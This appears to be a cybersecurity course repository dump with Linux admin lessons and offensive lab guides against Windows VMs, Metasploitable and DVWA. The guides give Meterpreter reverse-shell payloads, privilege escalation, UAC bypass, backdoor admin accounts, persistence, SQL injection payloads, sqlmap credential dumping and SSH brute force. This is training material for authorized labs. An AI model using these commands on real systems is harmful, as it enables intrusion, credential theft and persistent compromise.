`sudo` privileges. To safely edit it, use: 108 | ```bash 109 | sudo visudo 110 | ``` 111 | This prevents syntax errors that could lock you out. 112 | 113 | --- 114 | 115 | ## **7. Checking Sudo Access for a User** 116 | To see if a user has `sudo` privileges: 117 | ```bash 118 | sudo -l 119 | ``` 120 | 121 | --- 122 | 123 | ## **8. Restricting Root Access** 124 | To **disable direct root login**, edit: 125 | ```bash 126 | sudo nano /etc/ssh/sshd_config 127 | ``` 128 | Find: 129 | ```bash 130 | PermitRootLogin yes 131 | ``` 132 | Change to: 133 | ```bash 134 | PermitRootLogin no 135 | ``` 136 | Then restart SSH: 137 | ```bash 138 | sudo systemctl restart ssh 139 | ``` 140 | 141 | --- 142 | 143 | ## **Conclusion** 144 | - Use **`sudo`** for safer privilege escalation. 145 | - Use **`su`** only if you need a full root session. 146 | - Be careful with root privileges to avoid damaging the system. 147 | 148 | --- 149 | 150 | ### **🔍 Hands-On Activities** 151 | 1️⃣ Try switching to root using `su` and then `exit`. 152 | 2️⃣ Use `sudo` to install a package (`sudo apt install htop`). 153 | 3️⃣ Check sudo access with `sudo -l`. 154 | 4️⃣ Disable direct root login via SSH for security. 155 | -------------------------------------------------------------------------------- /week2/day9_ssh.md: -------------------------------------------------------------------------------- 1 | ### **SSH (Secure Shell): A Cornerstone of Secure Remote Communication** 2 | 3 | In Linux networking, **Secure Shell (SSH)** is a cryptographic protocol designed to provide secure, encrypted communication between two networked devices. It is an essential tool for system administrators, developers, and anyone managing remote servers. SSH ensures the confidentiality, integrity, and authenticity of data transmission, making it far superior to non-secure alternatives like Telnet or FTP. 4 | 5 | --- 6 | 7 | ### **Key Features of SSH** 8 | 9 | 1. **Secure Remote Login**: Enables secure access to remote systems for administrative tasks. 10 | 2. **Remote Command Execution**: Run commands on remote machines without direct physical access. 11 | 3. **File Transfers**: Securely transfer files between systems using tools like `scp` or `rsync`. 12 | 4. **Tunneling**: Forward ports securely over the SSH connection, providing encrypted access to other services. 13 | 5. **Public Key Authentication**: Offers password-less login via public-private key pairs for enhanced security. 14 | 15 | --- 16 | 17 | ### **Basic SSH Usage** 18 | 19 | #### **Command Syntax** 20 | ```bash 21 | ssh username@server_ip_address 22 | ``` 23 | - **`username`**: The user account on the remote server. 24 | - **`server_ip_address`**: The IP address or hostname of the remote server. 25 | 26 | After running this command, you’ll be prompted to enter the password for the specified user. Upon successful authentication, you'll gain remote access to the server. 27 | 28 | #### **Example** 29 | ```bash 30 | ssh admin@192.168.1.100 31 | ``` 32 | 33 | --- 34 | 35 | ### **Advanced SSH Usage** 36 | 37 | 1. **Specify a Custom Port** 38 | By default, SSH uses port 22. To connect to a server running SSH on a different port: 39 | ```bash 40 | ssh -p 2222 username@server_ip_address 41 | ``` 42 | 43 | 2. **Copy Files Using `scp`** 44 | ```bash 45 | scp localfile.txt username@server_ip_address:/remote/path/ 46 | ``` 47 | This securely transfers `localfile.txt` to the remote server. 48 | 49 | 3. **Generate SSH Key Pair for Password-less Login** 50 | ```bash 51 | ssh-keygen -t rsa 52 | ssh-copy-id username@server_ip_address 53 | ``` 54 | This generates a key pair and copies the public key to the remote server for password-less access. 55 | 56 | 4. **SSH Tunneling** 57 | Forward a local port to a remote server: 58 | ```bash 59 | ssh -L local_port:remote_host:remote_port username@server_ip_address 60 | ``` 61 | 62 | --- 63 | 64 | ### **SSH Configuration** 65 | 66 | SSH client and server behavior can be customized via configuration files: 67 | 68 | - **Client Config**: `/etc/ssh/ssh_config` or `~/.ssh/config` 69 | - **Server Config**: `/etc/ssh/sshd_config` 70 | 71 | #### Example: Customizing the Client Configuration 72 | Add the following to `~/.ssh/config`: 73 | ```plaintext 74 | Host myserver 75 | HostName 192.168.1.100 76 | User admin 77 | Port 2222 78 | ``` 79 | Now you can connect to the server with: 80 | ```bash 81 | ssh myserver 82 | ``` 83 | 84 | --- 85 | 86 | ### **Security Best Practices** 87 | 88 | 1. **Disable Root Login**: Prevent direct root access by setting `PermitRootLogin no` in `/etc/ssh/sshd_config`. 89 | 2. **Use Public Key Authentication**: Replace password authentication with key-based authentication for stronger security. 90 | 3. **Change the Default SSH Port**: Use a non-standard port to reduce automated attacks. 91 | 4. **Enable Fail2Ban**: Protect against brute-force attacks by blocking repeated failed login attempts. 92 | 5. **Disable SSH for Unnecessary Users**: Restrict access by configuring `AllowUsers` or `AllowGroups` in the SSH server configuration. 93 | 94 | --- 95 | 96 | ### **Practical Applications of SSH** 97 | 98 | - **Remote System Management**: Manage servers without needing physical access. 99 | - **Secure File Transfers**: Protect sensitive data during transfers. 100 | - **Encrypted Communication**: Securely communicate over potentially insecure networks. 101 | - **Port Forwarding and Tunneling**: Access remote services securely over an SSH tunnel. 102 | 103 | By understanding and effectively using SSH, administrators and users can maintain secure and efficient access to Linux systems, ensuring data privacy and integrity in networking environments. 104 | -------------------------------------------------------------------------------- /projects/Post-exploitation-task.md: -------------------------------------------------------------------------------- 1 | **Privilege Escalation Task** 2 | 3 | **Objective** 4 | Escalate privileges on a Windows 7 or Windows 8 machine by identifying vulnerabilities and exploiting them to gain administrator or system-level access. 5 | 6 | **Requirements** 7 | - Kali Linux virtual machine (Metasploit, PowerSploit, and Windows Exploit Suggester) 8 | - Windows 7 or Windows 8 virtual machine (standard user account) 9 | - Virtual environment (VirtualBox or VMware with NAT/Host-Only Network) 10 | - Required tools: 11 | - Metasploit Framework 12 | - Windows Exploit Suggester 13 | - PowerShell scripts (PowerUp, Invoke-AllChecks) 14 | 15 | --- 16 | 17 | ### **Part 1: Gaining Initial Access** 18 | 19 | 1. **Generate a Meterpreter Reverse Shell Payload** using msfvenom: 20 | ``` 21 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > shell.exe 22 | ``` 23 | 2. **Deliver the Payload** to the Windows machine through any method such as: 24 | - USB drive (simulated) 25 | - Social engineering (simulated) 26 | - Execution via PowerShell 27 | - Expose it to internet using apache2 28 | 3. **Set Up a Listener in Metasploit:** 29 | ``` 30 | use exploit/multi/handler 31 | set payload windows/meterpreter/reverse_tcp 32 | set LHOST 33 | set LPORT 4444 34 | exploit -j 35 | ``` 36 | 4. **Execute the Payload on Windows 7/8** and establish a connection. 37 | 38 | --- 39 | 40 | ### **Part 2: Privilege Escalation** 41 | 42 | #### **Step 1: Identify Privileges** 43 | Inside Meterpreter, check the current user: 44 | ``` 45 | getuid 46 | ``` 47 | Check system information: 48 | ``` 49 | sysinfo 50 | ``` 51 | 52 | #### **Step 2: Use Automated Privilege Escalation Tools** 53 | 54 | **Option 1: Metasploit GetSystem** 55 | ``` 56 | use post/windows/escalate/getsystem 57 | run 58 | ``` 59 | 60 | **Option 2: Migrate to a High-Privilege Process** 61 | 1. List running processes: 62 | ``` 63 | ps 64 | ``` 65 | 2. Identify a process owned by SYSTEM (e.g., winlogon.exe, lsass.exe). 66 | 3. Migrate into the process: 67 | ``` 68 | migrate 69 | ``` 70 | 4. Verify privilege level: 71 | ``` 72 | getuid 73 | ``` 74 | 75 | **Option 3: PowerShell Privilege Escalation (Manual)** 76 | 1. Upload and execute PowerUp: 77 | ``` 78 | upload /usr/share/windows-resources/powerup.ps1 C:\\Users\\Public\\powerup.ps1 79 | ``` 80 | ``` 81 | powershell -ExecutionPolicy Bypass -File C:\\Users\\Public\\powerup.ps1 82 | ``` 83 | 2. Identify misconfigured services, unquoted service paths, or DLL hijacking opportunities. 84 | 85 | #### **Step 3: Exploit a Local Vulnerability** 86 | 1. On Kali, download the Windows Exploit Suggester: 87 | ``` 88 | git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git 89 | ``` 90 | 2. Collect Windows system information: 91 | ``` 92 | systeminfo > win7info.txt 93 | ``` 94 | 3. Run the exploit suggester: 95 | ``` 96 | python windows-exploit-suggester.py -i win7info.txt -d exploits.csv 97 | ``` 98 | 4. Identify a suitable exploit (e.g., CVE-2016-0099) and execute it. 99 | 100 | #### **Step 4: Bypass UAC (User Account Control)** 101 | If the user is in the Administrators group but blocked by UAC, try: 102 | ``` 103 | use exploit/windows/local/bypassuac 104 | set SESSION 1 105 | exploit 106 | ``` 107 | 108 | --- 109 | 110 | ### **Part 3: Post-Exploitation** 111 | 112 | 1. **Create a New Admin User:** 113 | ``` 114 | net user hacker P@ssw0rd /add 115 | net localgroup administrators hacker /add 116 | ``` 117 | 2. **Set Up Persistence:** 118 | ``` 119 | run persistence -U -i 5 -p 4444 -r 120 | ``` 121 | 122 | --- 123 | 124 | ### **Evaluation Criteria** 125 | You will be assessed based on the following criteria: 126 | - Successfully gaining initial access to the Windows 7/8 machine. 127 | - Using at least two different privilege escalation techniques. 128 | - Documenting each step taken and explaining obstacles encountered. 129 | - Demonstrating post-exploitation tasks such as creating a new user and establishing persistence. 130 | 131 | --- 132 | 133 | ### **Bonus Challenges** 134 | - Exploit unquoted service paths. 135 | - Perform DLL hijacking. 136 | - Set up scheduled tasks for persistence. 137 | - Use Mimikatz for credential dumping. 138 | -------------------------------------------------------------------------------- /projects/exploiting_sql_injection.md: -------------------------------------------------------------------------------- 1 | ## SQL Injection (SQLi) 2 | 3 | ## **1. Introduction to SQL Injection** 4 | SQL Injection (SQLi) is a web security vulnerability that allows an attacker to manipulate SQL queries executed by an application. This can lead to unauthorized access, data leakage, or even full database compromise. 5 | 6 | ### **1.1 How SQL Injection Works** 7 | When a web application does not properly validate or sanitize user inputs, an attacker can inject malicious SQL code into database queries. 8 | 9 | For example, consider the following vulnerable query: 10 | 11 | ```sql 12 | SELECT * FROM users WHERE username = '$input_username' AND password = '$input_password'; 13 | ``` 14 | If a user inputs `admin' --` as the username, the query becomes: 15 | 16 | ```sql 17 | SELECT * FROM users WHERE username = 'admin' --' AND password = ''; 18 | ``` 19 | The `--` makes the rest of the query a comment, effectively bypassing authentication. 20 | 21 | --- 22 | 23 | ## **2. Types of SQL Injection Attacks** 24 | 1. **Error-Based SQL Injection** – Uses database error messages to extract information. 25 | 2. **Union-Based SQL Injection** – Uses the `UNION` SQL operator to combine results from different queries. 26 | 3. **Boolean-Based (Blind) SQL Injection** – Exploits conditional responses (True/False) without error messages. 27 | 4. **Time-Based (Blind) SQL Injection** – Uses SQL commands like `SLEEP()` to determine if a query is vulnerable. 28 | 5. **Out-of-Band SQL Injection** – Uses external channels (e.g., DNS or HTTP requests) to extract data. 29 | 30 | --- 31 | 32 | ## **3. Manually Testing for SQL Injection** 33 | 34 | ### **3.1 Identifying Vulnerable Parameters** 35 | 1. Use `'` (single quote) in input fields. If an error occurs, the input is likely vulnerable. 36 | 2. Use common SQL payloads like: 37 | 38 | ``` 39 | ' OR 1=1 -- 40 | ' UNION SELECT null, version() -- 41 | ``` 42 | 43 | 3. Check for database errors in responses (e.g., `MySQL syntax error` or `Unclosed quotation mark after the character string`). 44 | 45 | ### **3.2 Common SQLi Payloads** 46 | - **Bypassing Login** 47 | ``` 48 | admin' -- 49 | ' OR 1=1 -- 50 | ' OR '1'='1' -- 51 | ``` 52 | 53 | - **Extracting Database Version** 54 | ``` 55 | ' UNION SELECT null, @@version -- 56 | ``` 57 | 58 | - **Enumerating Database Tables (MySQL)** 59 | ``` 60 | ' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema=database() -- 61 | ``` 62 | 63 | --- 64 | 65 | ## **4. Automating SQL Injection with SQLmap** 66 | SQLmap is a powerful tool for automating SQL injection testing. 67 | 68 | ### **4.1 Installing SQLmap** 69 | On Kali Linux, SQLmap is pre-installed. If not, install it using: 70 | ```bash 71 | sudo apt install sqlmap 72 | ``` 73 | For other systems: 74 | ```bash 75 | pip install sqlmap 76 | ``` 77 | 78 | ### **4.2 Basic SQLmap Usage** 79 | Run SQLmap against a vulnerable URL: 80 | ```bash 81 | sqlmap -u "http://target.com/page.php?id=1" --dbs 82 | ``` 83 | This command: 84 | - Tests `id=1` for SQL injection 85 | - Lists all available databases 86 | 87 | ### **4.3 Extracting Tables & Columns** 88 | Find tables in a specific database: 89 | ```bash 90 | sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables 91 | ``` 92 | Find columns in a table: 93 | ```bash 94 | sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns 95 | ``` 96 | 97 | ### **4.4 Dumping Data** 98 | To extract usernames and passwords: 99 | ```bash 100 | sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users --dump 101 | ``` 102 | 103 | ### **4.5 Bypassing Login with SQLmap** 104 | ```bash 105 | sqlmap -u "http://target.com/login.php" --data="username=admin&password=123" --dump 106 | ``` 107 | This automates SQL injection in login forms. 108 | 109 | --- 110 | 111 | ## **5. Preventing SQL Injection** 112 | 113 | - Use **Prepared Statements (Parameterized Queries)** 114 | ```python 115 | cursor.execute("SELECT * FROM users WHERE username = ? AND password = ?", (username, password)) 116 | ``` 117 | 118 | - **Input Validation & Whitelisting** 119 | - **Least Privilege for Database Users** 120 | - **Web Application Firewalls (WAF)** 121 | - **Regular Security Audits & Penetration Testing** 122 | -------------------------------------------------------------------------------- /projects/metasploit_network_cap.md: -------------------------------------------------------------------------------- 1 | ### **Setting Up a Metasploitable Network and Capturing Traffic with Wireshark in Kali** 2 | --- 3 | 4 | ## **Requirements** 5 | **Virtual Machines (VMs)** 6 | - **Kali Linux** (Attacker Machine) 7 | - **Metasploitable 2** (Target Machine) 8 | 9 | **Tools Needed** 10 | - **VMware/VirtualBox** (To run the virtual machines) 11 | - **Wireshark** (For packet capture) 12 | - **Metasploit Framework** (For attacking the target) 13 | 14 | **Network Configuration** 15 | - Set both VMs to **Host-Only Network** or **NAT with Port Forwarding** 16 | - Kali will act as the **attacker** 17 | - Metasploitable will be the **victim** 18 | 19 | ## **Setting Up Metasploitable 2** 20 | *Metasploitable is a deliberately vulnerable Linux machine for penetration testing.* 21 | 22 | ### **Steps to Install Metasploitable:** 23 | **Download Metasploitable 2:** 24 | - Get the **OVA file** from [here](https://sourceforge.net/projects/metasploitable/). 25 | 26 | **Import into VirtualBox/VMware:** 27 | - Open VirtualBox → `File` → `Import Appliance` → Select **Metasploitable.ova** 28 | 29 | 3**Network Settings:** 30 | - Go to **Settings → Network** 31 | - Set **Adapter 1** to **Host-Only Adapter** (or NAT) 32 | 33 | **Start Metasploitable and Get IP Address:** 34 | - Login with: 35 | ```plaintext 36 | Username: msfadmin 37 | Password: msfadmin 38 | ``` 39 | - Run: 40 | ```bash 41 | ifconfig 42 | ``` 43 | - Note the **IP address** (e.g., `192.168.56.101`). 44 | 45 | ## **Setting Up Kali Linux** 46 | *Kali Linux will be used to attack Metasploitable and capture network traffic.* 47 | 48 | ### **Steps:** 49 | **Open Kali Linux in VirtualBox/VMware** 50 | **Network Settings:** 51 | - Set **Adapter 1** to **Host-Only Adapter** (same as Metasploitable) 52 | **Confirm Network Connection:** 53 | - Open a terminal in Kali and ping Metasploitable: 54 | ```bash 55 | ping 192.168.56.101 56 | ``` 57 | - If successful, your network is properly configured. 58 | 59 | ## **Capturing Network Traffic with Wireshark** 60 | *Wireshark will capture all traffic between Kali and Metasploitable.* 61 | 62 | ### **Steps to Capture Traffic:** 63 | **Open Wireshark in Kali:** 64 | ```bash 65 | wireshark & 66 | ``` 67 | **Select Your Network Interface:** 68 | - Choose `eth0` (or the interface that connects to Metasploitable). 69 | **Start Capturing:** 70 | - Click **Start Capture** (Blue Shark Fin icon). 71 | 72 | ## **Simulating an Attack & Capturing Credentials** 73 | *Now, we will simulate a login attack and capture credentials.* 74 | 75 | ### **Step 1: Connect to Metasploitable via Telnet (Unencrypted Protocol)** 76 | 1. In Kali, run: 77 | ```bash 78 | telnet 192.168.56.101 79 | ``` 80 | 2. Enter **any username & password** (doesn’t matter if correct). 81 | 82 | ### **Step 2: Capture Credentials in Wireshark** 83 | 1. In Wireshark, apply a filter to see Telnet traffic: 84 | ```plaintext 85 | telnet 86 | ``` 87 | 2. Look for **login credentials** in plain text! 88 | 89 | ## **5️⃣ Advanced Attack: Exploiting SSH with Metasploit** 90 | 📌 *Now, we will use Metasploit to attack an SSH service and capture network traffic.* 91 | 92 | ### **Step 1: Scan for Open Ports on Metasploitable** 93 | 1️⃣ In Kali, run: 94 | ```bash 95 | nmap -sV 192.168.56.101 96 | ``` 97 | 2️⃣ Look for **port 22 (SSH)** in the results. 98 | 99 | ### **Step 2: Run an SSH Brute Force Attack** 100 | 1️⃣ Open Metasploit: 101 | ```bash 102 | msfconsole 103 | ``` 104 | 2️⃣ Use the SSH brute-force module: 105 | ```bash 106 | use auxiliary/scanner/ssh/ssh_login 107 | set RHOSTS 192.168.56.101 108 | set USERNAME msfadmin 109 | set PASSWORD msfadmin 110 | run 111 | ``` 112 | 113 | ### **Step 3: Capture SSH Attack in Wireshark** 114 | 1️⃣ In Wireshark, apply the filter: 115 | ```plaintext 116 | ssh 117 | ``` 118 | 2️⃣ Observe the brute-force attack attempts! 119 | 120 | --- 121 | 122 | ## **🎯 Outcome** 123 | ✔️ Successfully captured **Telnet & SSH traffic**. 124 | ✔️ Extracted **plaintext credentials** from unencrypted traffic. 125 | ✔️ Identified attack patterns using **Wireshark**. 126 | -------------------------------------------------------------------------------- /projects/auto_qlinjection.md: -------------------------------------------------------------------------------- 1 | ## **Exploiting SQL Injection on DVWA Using SQLmap and Metasploit** 2 | 3 | In this guide, we’ll exploit **Damn Vulnerable Web Application (DVWA)** using **SQLmap** to find an SQL Injection vulnerability and then use **Metasploit** to gain a reverse shell. 4 | 5 | --- 6 | 7 | ## **1. Setting Up the DVWA Environment** 8 | ### **1.1 Install DVWA on Kali Linux** 9 | If you don’t already have DVWA installed, set it up using: 10 | 11 | ```bash 12 | sudo apt update 13 | sudo apt install apache2 mariadb-server php php-mysqli php-gd libapache2-mod-php 14 | ``` 15 | 16 | Download and set up DVWA: 17 | ```bash 18 | git clone https://github.com/digininja/DVWA.git /var/www/html/dvwa 19 | sudo chmod -R 777 /var/www/html/dvwa 20 | sudo chown -R www-data:www-data /var/www/html/dvwa 21 | sudo systemctl restart apache2 mariadb 22 | ``` 23 | 24 | ### **1.2 Configure DVWA** 25 | 1. Navigate to `http://localhost/dvwa/setup.php`. 26 | 2. Click **“Create / Reset Database”**. 27 | 3. Log in with **admin/password**. 28 | 4. Set **DVWA Security Level to Low** (Go to `DVWA Security` settings). 29 | 30 | --- 31 | 32 | ## **2. Exploiting SQL Injection with SQLmap** 33 | Once DVWA is running, find a vulnerable parameter. 34 | 35 | ### **2.1 Identify a Vulnerable Endpoint** 36 | Go to `http://localhost/dvwa/vulnerabilities/sqli/` and enter: 37 | ```sql 38 | ' OR 1=1 -- 39 | ``` 40 | If the response changes, the parameter is vulnerable. 41 | 42 | ### **2.2 Use SQLmap to Exploit the Vulnerability** 43 | Run SQLmap to detect SQL injection on DVWA: 44 | ```bash 45 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" --dbs 46 | ``` 47 | Replace `PHPSESSID=xxxxx` with your session ID from the browser (Inspect > Storage > Cookies). 48 | 49 | This command: 50 | ✅ Identifies databases in MySQL 51 | 52 | ### **2.3 Extract Tables and Columns** 53 | Find tables in `dvwa` database: 54 | ```bash 55 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" -D dvwa --tables 56 | ``` 57 | Find columns in the `users` table: 58 | ```bash 59 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" -D dvwa -T users --columns 60 | ``` 61 | 62 | ### **2.4 Dump User Credentials** 63 | ```bash 64 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" -D dvwa -T users --dump 65 | ``` 66 | ✅ This extracts **usernames and hashed passwords**. 67 | 68 | --- 69 | 70 | ## **3. Gaining Shell Access via Metasploit** 71 | We will now escalate the attack using **Metasploit**. 72 | 73 | ### **3.1 Check if Command Execution is Possible** 74 | ```bash 75 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" --os-shell 76 | ``` 77 | If successful, you’ll get an interactive shell. 78 | 79 | ### **3.2 Inject a Metasploit Reverse Shell** 80 | 1. Open Metasploit: 81 | ```bash 82 | msfconsole 83 | ``` 84 | 85 | 2. Set up a listener: 86 | ```bash 87 | use exploit/multi/handler 88 | set payload php/meterpreter/reverse_tcp 89 | set LHOST 90 | set LPORT 4444 91 | exploit 92 | ``` 93 | 94 | 3. Inject a PHP reverse shell using SQLmap: 95 | ```bash 96 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" --file-write=/var/www/html/dvwa/shell.php --file-dest=/var/www/html/dvwa/shell.php 97 | ``` 98 | 99 | 4. Execute the shell: 100 | ``` 101 | curl http://localhost/dvwa/shell.php 102 | ``` 103 | Now check your Metasploit listener—**you should have a meterpreter session**. 104 | 105 | --- 106 | 107 | ## **4. Post-Exploitation** 108 | Once inside, you can: 109 | ✅ **Dump database contents** 110 | ✅ **Escalate privileges** 111 | ✅ **Download sensitive files** 112 | 113 | Try: 114 | ```bash 115 | meterpreter> sysinfo 116 | meterpreter> shell 117 | ``` 118 | 119 | --- 120 | 121 | ## **5. Mitigation & Defense** 122 | To prevent SQL Injection: 123 | ✅ Use **Prepared Statements** 124 | ✅ **Sanitize Input** (`htmlspecialchars()`, `mysqli_real_escape_string()`) 125 | ✅ **Limit Database Privileges** 126 | ✅ Use a **Web Application Firewall (WAF)** 127 | -------------------------------------------------------------------------------- /projects/dvwa_low.md: -------------------------------------------------------------------------------- 1 | # **Exploiting SQL Injection on DVWA (Low Level) Manually & Using SQLmap** 2 | 3 | In this guide, we will perform **SQL Injection (SQLi) exploitation** on **Damn Vulnerable Web Application (DVWA)** with security set to **Low**. 4 | 5 | We will cover **both manual exploitation and automation using SQLmap**. 6 | 7 | --- 8 | 9 | ## **1. Setting Up DVWA** 10 | Before attacking, make sure **DVWA is running** on your system. 11 | 12 | ### **1.1 Start Services** 13 | If you're using **Kali Linux**, start Apache and MySQL: 14 | ```bash 15 | sudo systemctl start apache2 16 | sudo systemctl start mysql 17 | ``` 18 | 19 | ### **1.2 Log into DVWA** 20 | 1. Open your browser and go to: 21 | ``` 22 | http://localhost/dvwa/ 23 | ``` 24 | 2. Use default credentials: 25 | ``` 26 | Username: admin 27 | Password: password 28 | ``` 29 | 3. Set **Security Level to Low**: 30 | - Navigate to **DVWA Security** 31 | - Change **Security Level** to **Low** 32 | - Click **Submit** 33 | 34 | --- 35 | 36 | ## **2. Manual SQL Injection Exploitation** 37 | We'll manually test **SQL Injection on the User ID field**. 38 | 39 | ### **2.1 Identifying a Vulnerability** 40 | 1. Go to **SQL Injection page**: 41 | ``` 42 | http://localhost/dvwa/vulnerabilities/sqli/ 43 | ``` 44 | 2. Enter a **single quote (`'`)** in the input box and click **Submit**. 45 | 46 | **Example Input:** 47 | ``` 48 | ' 49 | ``` 50 | If you see an error like: 51 | ``` 52 | You have an error in your SQL syntax 53 | ``` 54 | ✅ **The application is vulnerable to SQL injection.** 55 | 56 | --- 57 | 58 | ### **2.2 Bypassing Authentication** 59 | Now, let's **bypass authentication** using SQL injection. 60 | 61 | 1. Enter the following payload in the **User ID** field: 62 | ``` 63 | 1' OR 1=1 -- 64 | ``` 65 | 2. Click **Submit**. 66 | 67 | **Explanation:** 68 | - `1' OR 1=1 --` **always evaluates to TRUE**, returning all users. 69 | - The `--` **comments out the rest of the SQL query**. 70 | 71 | --- 72 | 73 | ### **2.3 Extracting Database Version** 74 | Enter the following payload in **User ID**: 75 | ```sql 76 | 1' UNION SELECT null, @@version -- 77 | ``` 78 | ✅ This will **return the database version**. 79 | 80 | --- 81 | 82 | ### **2.4 Listing All Database Tables** 83 | Use: 84 | ```sql 85 | 1' UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=database() -- 86 | ``` 87 | ✅ **Returns table names** in the current database. 88 | 89 | --- 90 | 91 | ### **2.5 Extracting User Credentials** 92 | Use: 93 | ```sql 94 | 1' UNION SELECT null, concat(user, ':', password) FROM users -- 95 | ``` 96 | ✅ **Extracts usernames and passwords.** 97 | 98 | --- 99 | 100 | ## **3. Automating SQL Injection Using SQLmap** 101 | Now, let's use **SQLmap** to automate the attack. 102 | 103 | ### **3.1 Capture Request Data** 104 | 1. Open **DVWA's SQL Injection page**. 105 | 2. **Intercept the request** using **Burp Suite** or browser developer tools. 106 | 3. Identify the vulnerable URL: 107 | ``` 108 | http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit 109 | ``` 110 | 111 | --- 112 | 113 | ### **3.2 Enumerating Databases** 114 | Run SQLmap: 115 | ```bash 116 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" --dbs 117 | ``` 118 | ✅ **Lists all databases**. 119 | 120 | --- 121 | 122 | ### **3.3 Extracting Tables** 123 | Find tables in `dvwa`: 124 | ```bash 125 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" -D dvwa --tables 126 | ``` 127 | ✅ **Lists table names**. 128 | 129 | --- 130 | 131 | ### **3.4 Extracting Columns from `users` Table** 132 | ```bash 133 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" -D dvwa -T users --columns 134 | ``` 135 | ✅ **Lists column names**. 136 | 137 | --- 138 | 139 | ### **3.5 Dumping Usernames & Passwords** 140 | ```bash 141 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" -D dvwa -T users --dump 142 | ``` 143 | ✅ **Extracts all user credentials.** 144 | 145 | --- 146 | 147 | ## **4. Preventing SQL Injection** 148 | To **mitigate SQLi vulnerabilities**: 149 | ✅ Use **Prepared Statements** 150 | ✅ Sanitize user input 151 | ✅ Apply **least privilege** to database users 152 | ✅ Enable **Web Application Firewalls (WAF)** 153 | -------------------------------------------------------------------------------- /week2/day8_netlify.md: -------------------------------------------------------------------------------- 1 | ### **Netfilter: The Backbone of Linux Packet Manipulation** 2 | 3 | Netfilter is an integral part of the Linux kernel that enables the inspection, manipulation, and control of network packets as they traverse the networking stack. Its modular and extensible design allows system administrators to define custom packet-handling rules, making it a versatile tool for tasks like firewall management, Network Address Translation (NAT), and traffic shaping. 4 | 5 | --- 6 | 7 | ### **Key Features of Netfilter** 8 | 9 | 1. **Packet Filtering**: Control incoming and outgoing traffic by applying rules to accept, reject, or drop packets. 10 | 2. **Network Address Translation (NAT)**: Modify packet headers to translate between private and public IP addresses. 11 | 3. **Packet Logging**: Monitor and debug network traffic by logging packets that meet certain criteria. 12 | 4. **Custom Hooks**: Extend functionality by inserting user-defined hooks into the kernel's networking stack. 13 | 5. **Traffic Shaping**: Prioritize or limit bandwidth usage for specific traffic types. 14 | 15 | --- 16 | 17 | ### **Netfilter Hook Points** 18 | 19 | Netfilter provides several hook points in the Linux networking stack where packets can be intercepted and processed: 20 | 21 | 1. **PREROUTING**: Modify packets before routing decisions are made. 22 | 2. **INPUT**: Process packets destined for the local system. 23 | 3. **FORWARD**: Handle packets that are routed through the system but not destined for it. 24 | 4. **OUTPUT**: Process packets originating from the local system. 25 | 5. **POSTROUTING**: Modify packets after routing decisions are made. 26 | 27 | --- 28 | 29 | ### **Using `iptables` with Netfilter** 30 | 31 | The `iptables` utility is the user-space interface for configuring Netfilter rules. Below is an example of creating a simple firewall rule: 32 | 33 | #### **Example Command** 34 | ```bash 35 | iptables -A INPUT -i eth0 -s 192.168.0.0/24 -m conntrack --ctstate NEW -j DROP 36 | ``` 37 | 38 | #### **Explanation**: 39 | - `-A INPUT`: Appends a new rule to the `INPUT` chain. 40 | - `-i eth0`: Specifies the network interface (`eth0`) to apply the rule to. 41 | - `-s 192.168.0.0/24`: Limits the rule to traffic originating from the `192.168.0.0/24` subnet. 42 | - `-m conntrack`: Uses the `conntrack` module for connection tracking. 43 | - `--ctstate NEW`: Targets new connection attempts. 44 | - `-j DROP`: Drops matching packets. 45 | 46 | --- 47 | 48 | ### **Advanced Use Cases** 49 | 50 | 1. **Network Address Translation (NAT)** 51 | ```bash 52 | iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE 53 | ``` 54 | - Enables masquerading for outbound traffic on `eth0`. 55 | 56 | 2. **Port Forwarding** 57 | ```bash 58 | iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 192.168.1.10:80 59 | ``` 60 | - Forwards incoming traffic on port `8080` to `192.168.1.10:80`. 61 | 62 | 3. **Logging Packets** 63 | ```bash 64 | iptables -A INPUT -j LOG --log-prefix "Dropped Packet: " 65 | ``` 66 | - Logs dropped packets with the prefix `"Dropped Packet: "`. 67 | 68 | --- 69 | 70 | ### **Netfilter Framework Components** 71 | 72 | 1. **Tables**: Organize rules into groups. Common tables include: 73 | - `filter`: Default table for packet filtering. 74 | - `nat`: Handles NAT rules. 75 | - `mangle`: For advanced packet modifications. 76 | 77 | 2. **Chains**: Logical groupings of rules applied to packets. Common chains include: 78 | - `INPUT`, `OUTPUT`, `FORWARD` (for filtering). 79 | - `PREROUTING`, `POSTROUTING` (for NAT/mangling). 80 | 81 | 3. **Targets**: Actions taken when a rule matches: 82 | - `ACCEPT`: Allow the packet. 83 | - `DROP`: Silently discard the packet. 84 | - `LOG`: Log the packet for analysis. 85 | 86 | --- 87 | 88 | ### **Future of Netfilter and Alternatives** 89 | 90 